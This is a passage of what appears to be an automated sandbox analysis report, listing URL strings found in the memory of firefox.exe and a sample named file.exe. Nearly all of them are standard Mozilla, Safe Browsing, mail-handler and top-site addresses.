Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s_injectDefaultProtocolHandlersIfNeeded
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%sget
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001F.00000002.2970664695.000001B1136C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2970664695.000001B113680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001F.00000002.3023337743.00000CB01CC04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sunavailable:FEATURE_FAILURE_DCOMP_NOT_ANGLEgetOriginAttribute
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.comprofilerRecordingButtonCreated
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001F.00000002.2970664695.000001B113680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001F.00000002.2959421322.000001B106A00000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/experiments/screenshots/api.js
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/experiments/screenshots/api.jsWeb
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001F.00000002.3015576756.000001B11D463000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001F.00000002.2984824415.000001B1161D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001F.00000002.2984824415.000001B1161D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001F.00000002.2954167196.000001B1066CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001F.00000002.2954167196.000001B10663A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001F.00000002.2961348345.000001B110F08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2954167196.000001B1066CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001F.00000002.2987356094.000001B1165BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001F.00000002.2987356094.000001B1165BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986979517.000001B116405000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986979517.000001B116409000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001F.00000002.2962205193.000001B1110E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001F.00000002.3014298183.000001B11C458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 0000001F.00000002.3014298183.000001B11C458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2493886983.000000000043C000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsUse
Source: file.exe, 00000000.00000003.2196044703.000000002EDF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001F.00000002.2970664695.000001B113680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: file.exe, 00000000.00000002.2514256490.0000000028D61000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B48000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916983014.000001B112E5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/_notifyBackgroundTab/this._backgroundTabScrollPro
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: file.exe, 00000000.00000002.2514256490.0000000028D61000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/U.
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000001F.00000002.3000161016.000001B1177F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D61B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 0000001F.00000002.3006356102.000001B11BFBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916983014.000001B112E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2959421322.000001B106A00000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001F.00000002.3006356102.000001B11BFBC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2959421322.000001B106A00000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/https://vk.com/
Source: firefox.exe, 0000001F.00000002.2964737783.000001B111A09000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3024586000.00003E9C36B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2962205193.000001B1110E5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3010160093.000001B11C286000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
